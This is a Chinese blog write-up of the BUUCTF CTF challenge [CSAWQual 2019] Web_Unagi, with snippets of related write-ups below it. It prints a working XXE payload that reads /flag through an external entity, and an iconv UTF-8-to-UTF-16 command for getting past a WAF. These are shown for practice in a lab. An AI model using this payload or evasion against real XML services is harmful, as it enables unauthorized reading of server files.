BUUCTF [CSAWQual 2019]Web_Unagi 1

最新推荐文章于 2024-11-10 17:26:12 发布
最新推荐文章于 2024-11-10 17:26:12 发布
阅读量688 收藏
点赞数
分类专栏: 刷题日记 ctf buuctf 文章标签: buuctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_45642610/article/details/120201638
版权
本文讲述了在BUUCTF CSAWQual2019的Web_Unagi1挑战中,利用XML外部实体注入(XXE)漏洞来读取flag的详细过程。通过创建一个包含恶意实体的XML文件并上传,可以直接读取到/flag目录下的提示。虽然有提到可能需要将文件从UTF-8转为UTF-16来绕过WAF,但在此案例中直接上传XML文件并未遇到WAF拦截。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

BUUCTF [CSAWQual 2019]Web_Unagi 1

提示在/flag
在这里插入图片描述有提示了上传xml文件及其格式

在这里插入图片描述
直接用之前xml注入的上传即可。
改文件名为1.xml上传即可得flag

<?xml version='1.0'?>
<!DOCTYPE users [
<!ENTITY xxe SYSTEM "file:///flag" >]>
<users>
    <user>
        <username>&xxe;</username>
        <password>&xxe;</password>
        <name>&xxe;</name>
        <email>&xxe;</email>  
        <group>&xxe;</group>
        <intro>&xxe;</intro>
    </user>
</users>

在这里插入图片描述
&xxe;是引用读取flag的实体xxe,实体前后一定是&;闭合。

ps:
在其他wp里解释是用linux的vim转码,把UTF-8转为UTF-16绕过waf,但我直接上传也没见到waf拦截啊。怪怪的。
转码命令iconv -f utf8 -t utf-16 2.xml>1.xml

[CSAWQual 2019]Web_Unagi - 文件上传+XXE注入(XML编码绕过)
oZuoShen123的博客
10-10 1550
alice passwd1 Alice alice@fakesite.com CSAW2019 bob passwd2 Bob bob@fakesite.c
BUUCTF:[CSAWQual 2019]Web_Unagi -- xxe 简单的外部实体bypass ,编码绕过,
Zero_Adam的博客
04-08 769
二、学的的 这个好像是xxe的那啥,默认技巧吧,,utf8上传说有waf,然后就换成utf16进行上传 最近做的xxe的题,都是简单的每waf的。外部实体注入就好了,,, 注意,如果,system的命令 file:///flag。不好使的时候,还可用 PHP的伪协议来做,php://filer/这些来,到时候多试试就好了 三、 WP 初末 看一下iconv命令吧,总不能一个题什么都没学到东西啊, 语句: iconv -f utf8 -t utf16 test.xml -o aaa.xml 这个语句弄上
[CSAWQual 2019]Web_Unagi
snowlyzz的博客
09-13 229
xxe 绕过waf。
BUUCTF--[CSAWQual 2019]Web_Unagi
qq_46263951的博客
07-22 412
进入页面后看到一个Upload 看到给出的提示是让我们上传一个XML文件,刚好今天做了一个关于XML的XXE漏洞的题,底下贴链接,漏洞点为 给出提示flag在/flag中,所以构造出的payload为 <?xml version='1.0'?> <!DOCTYPE users [ <!ENTITY xxe SYSTEM "file:///flag" >]> <users> <user> <userna.
BUUCTF:[CSAWQual 2019]Web_Unagi
末初 · mochu7
04-06 2053
XXE编码转换为UTF-16绕过 2.xml <?xml version='1.0'?> <!DOCTYPE users [ <!ENTITY xxe SYSTEM "file:///flag" >]> <users> <user> <username>bob</username> ...
BUUCTF:[CSAWQual 2019]Web_Unagi
../../../../../../../
06-08 1082
打开界面 看看其他有什么内容: 来看看格式事例: 从信息提示我们可以知道要通过编写xml文件上传 即通过XXE编码转换成utf-16编码绕过 我们可以利用vim编辑xml文件(取名为2.xml) 构造payload如下: <?xml version='1.0'?> <!DOCTYPE users [ <!ENTITY xxe SYSTEM "file:///flag" >]> <users> <user> <
[CSAWQual 2019]Unagi
07-27
- *3* [BUUCTF [CSAWQual 2019]Web_Unagi 1](https://blog.youkuaiyun.com/weixin_45642610/article/details/120201638)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...
XCTF Web 记录(unagi
ximo的博客
03-09 397
unagi 打开页面,四个跳转。 一个提示页面: 一个利用方式提示: 一个利用点: 利用方式: XXE注入。 构造XXE注入代码: <?xml version='1.0'?> <!DOCTYPE users [ <!ENTITY xxe SYSTEM "file:///flag" >]> <users> <user> <username>bob</username> <pa
BUUCTF-[CSAWQual 2019]Web_Unagi 1
最新发布
dian的博客
11-10 334
在 UTF-16 编码下,XML 文档中的字符表示方式发生了改变。waf在处理 UTF-16 编码的 XML 时,无法正确解析或识别外部实体引用,从而让包含恶意外部实体的 XML 文档得以通过。定义文档类型为users,并在其中定义了一个实体xxe,通过SYSTEM关键字指定其值从本地文件系统的/flag文件中读取。,如果这个 XML 被解析,会尝试读取 /flag 文件的内容并显示在这里。给了一段xml文档,尝试在xml文档中添加xxe注入攻击,新建一个xml文档。再上传就能绕过waf,得到flag。
[CSAWQual 2019]Web_Unagi ---不会编程的崽
不会编程的崽的博客
03-07 637
xxe编码绕过
buuctf_练[CSAWQual 2019]Web_Unagi
m0_66225311的博客
10-26 418
`XXE`漏洞利用,`xml`文件转换编码绕过`WAF`(UTF-8 --> UTF-16),`xml`文件格式的书写
[CSAWQual 2019]Web_Unagi XXE漏洞练习题
dalaojiaoweb的博客
07-09 385
进来之后我们进行一个信息收集,在upload下可以看到有个here的超链接。点进去之后得到了如下的一些信息。使用我们的Visual Studio Code进行一个编码的转换,因为直接上传会被waf过滤。可以猜到是需要我们利用文件上传包含xxe漏洞利用来得到flag。利用我们学习的xxe漏洞的知识来进行一个模板的套用。最后进行一个文件上传即可得到flag。选择utf-16 LE,然后保存。这道题就是简单的xxe漏洞的注入。
攻防世界 web高手进阶区 5分题 unagi
闵行小鱼塘
04-12 516
攻防世界web高手进阶区的5分题,本篇是unagi的writeup
BUUCTF [CSAWQual 2016] i_got_id
snowlyzz的博客
09-02 268
perl CGI
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值